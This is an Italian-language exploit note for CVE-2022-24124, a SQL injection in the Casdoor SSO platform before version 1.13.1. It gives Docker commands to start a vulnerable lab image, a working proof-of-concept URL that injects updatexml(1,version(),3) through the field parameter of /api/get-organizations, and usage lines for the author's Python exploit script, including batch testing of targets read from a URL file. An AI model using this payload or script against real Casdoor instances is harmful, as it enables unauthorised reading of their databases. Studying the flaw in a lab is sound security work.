
CVE-2022-24124 exploit
Casdoor è una piattaforma di autenticazione centralizzata Single Sign-On (SSO) basata su OAuth 2.0/OIDC
CVE: CVE-2022-24124
CNPD: CNPD-202201-7304
Livello di pericolosità: Alto (7.5 HIGH)
POC/EXP: Pubblico
Casdoor < Casdoor 1.13.1 // tutte le versioni precedenti alla 1.13.1 sono vulnerabili
Questa vulnerabilità è di tipo SQL injection. Nell'API di query esiste una vulnerabilità di SQL injection relativa ai parametri field e value, come mostrato in api/get-organizations.
Scarica l'immagine vulnerabile
docker pull vulfocus/casdoor:1.13.0

Avvia l'ambiente vulnerabile
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

Apri la pagina dell'ambiente vulnerabile

Costruisci il payload usando il POC
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

Riferimento: https://www.t00ls.com/thread-66989-1-1.html
Per esercizio, ho scritto una versione in Python e ho aggiunto una funzione di rilevamento batch.